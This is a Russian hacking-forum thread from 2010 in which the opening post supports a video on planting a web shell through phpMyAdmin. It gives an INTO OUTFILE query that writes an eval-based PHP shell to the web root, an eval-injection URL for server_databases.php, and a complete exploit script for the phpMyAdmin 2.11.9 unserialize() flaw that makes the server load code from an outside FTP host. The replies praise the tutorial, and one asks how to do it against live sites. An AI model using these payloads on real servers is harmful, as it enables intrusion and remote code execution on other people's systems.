Старый 18.07.2010, 20:18   #1
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию Заливка шелла через phpMyAdmin

Ссылка для скачивания (1,08 Мб): http://www.sendspace.com/file/682w6o

Пояснение к видео:

Заливка шелла через phpMyAdmin

I. Into Outfile

Требования:
file_priv = Y
полный путь
папка с правами на запись

Узнаем имя пользователя БД, под которым мы сидим:
Код:
select user()
Проверяем, есть ли файловые привелегии у нашего юзера:
Код:
select file_priv from mysql.user where user='root'
Заливаем мини-шелл:
Код:
select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile 'D:/A/xampp/htdocs/s.php'
II. Code Execution

1) server_databases.php

Требования:
phpMyAdmin <= 2.11.9
MySQL 4.*

Смотрим на ссылки, узнаем наш token, в моём случае:
Код:
token=a327a405644acbcce02edb41461a58c9
Выполняем произвольный код:
Код:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();
2) unserialize()

Требования:

phpMyAdmin <= 2.11.9

Воспользуемся эксплойтом от M4g:

PHP код:
<?php
        
/*phpMyAdmin <= 2.11.9 unserialize() arbitrary PHP Code execution exploit*/
/*http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/, by M4g, icq 884888 (c) 2010*/
 
//Настройки
$pma_setup_url 'http://site.com/phpMyAdmin/scripts/setup.php'/*полный адрес скрипта установки phpMyAdmin*/
$ftp_code 'ftp://user:password@ftp.com/www/test.txt'/*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>*/
//Настройки
 
//отправляем http-данные
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method$url$data ''$referer_string ''$cookie_string ''$ua_string '')
    {
    
$return '';
    
$feof_count 0;
    
$parsed_url parse_url($url);
    
$site $parsed_url['host'];
    
$path $parsed_url['path'];
    
$query $parsed_url['query'];
 
    (
$method == 'GET' && !empty($data)) ? $path .= '?'.$data '';
    (
$method == 'POST' && !empty($query)) ? $path .= '?'.$query '';
 
    
$fp fsockopen($site80$errno$errstr30);
    (
$method == 'POST') ? $out "POST $path HTTP/1.1\r\n" $out "GET $path HTTP/1.1\r\n";
       
$out .= "Host: $site\r\n";
      
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
         
$out .= "Connection: Close\r\n";
       
$out .= "User-Agent: $ua_string\r\n";
       
$out .= "Referer: $referer_string\r\n";
       
$out .= "Cookie: $cookie_string\r\n";
    (
$method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" $out .= "\r\n";
    (
$method == 'POST') ? fwrite($fp$out.$data) : fwrite($fp$out);
 
    while (!
feof($fp)) 
        {
        if(
$feof_count >=200)
            break;
 
        
$return .= fread($fp4800);
        ++
$feof_count;
        }
 
    
fclose($fp);
    return 
$return;
    }
 
$token_page send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');
 
preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
 
$token $token_array[1];
 
preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
 
$cookie_array $cookie_array[1];
$cookie_array implode("; ",$cookie_array);
 
print 
send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');
?>

Последний раз редактировалось Ded MustD!e; 18.07.2010 в 22:07..
Ded MustD!e вне форума   Ответить с цитированием
Старый 18.07.2010, 23:00   #2
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Понравилось исполнение, небольшой размер файла, тема раскрыта, ничего лишнего в ролике, достаточный комментарий. И уж если в темах существуют правила оформления постов, то этот ролик может служить ориентиром, видео-примером правильной работы.

А если рука все-таки написала "Я, хакирь, счас пакажу" - ничего страшного, посмотри, полюбуйся, потом открой VirtualDub и сотри все лишнее, и пожми с нужным качеством, с оглядкой на размер файла.
nikp вне форума   Ответить с цитированием
Старый 19.07.2010, 03:01   #3
The matrix
 
Аватар для The matrix
 
Регистрация: 05.07.2010
Сообщений: 39
Репутация: 46
По умолчанию

Тема май админа раскрыта за 1:57 без судрожных движений. Отлично . Яркий пример правильно снятого видео.
The matrix вне форума   Ответить с цитированием
Старый 28.07.2010, 10:05   #4
Demon1X
 
Аватар для Demon1X
 
Регистрация: 10.07.2010
Сообщений: 56
Репутация: 5
По умолчанию

каким образом удалось так сжать видео?
Demon1X вне форума   Ответить с цитированием
Старый 28.07.2010, 22:22   #5
morty10
 
Аватар для morty10
 
Регистрация: 05.07.2010
Сообщений: 77
По умолчанию

все видео от Camstudio так ужимаются.
этот результат достигается тем, что в видео много повторяющихся кадров.
а в Camtasia используется свой кодек, и с ним тоже очень удобно работать, в плане размер/качество.
__________________
Research for share.
morty10 вне форума   Ответить с цитированием
Старый 06.01.2011, 21:54   #6
MR.JOEY
 
Аватар для MR.JOEY
 
Регистрация: 17.12.2010
Сообщений: 1
Репутация: 0
По умолчанию

на локал хостах
лучшебы показали как в сети заливать
и дампить)))
MR.JOEY вне форума   Ответить с цитированием
Старый 07.01.2011, 06:46   #7
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Цитата:
Сообщение от MR.JOEY Посмотреть сообщение
на локал хостах
лучшебы показали как в сети заливать
и дампить)))
а чем отличается заливка на локалхосте от заливки в сети, можно узнать?
Ded MustD!e вне форума   Ответить с цитированием
Старый 07.01.2011, 10:21   #8
NetAng
 
Аватар для NetAng
 
Регистрация: 05.01.2011
Сообщений: 34
Репутация: 1
По умолчанию

Спасибо за видео, всё быстро и без лишних движений...пригодиться...
NetAng вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot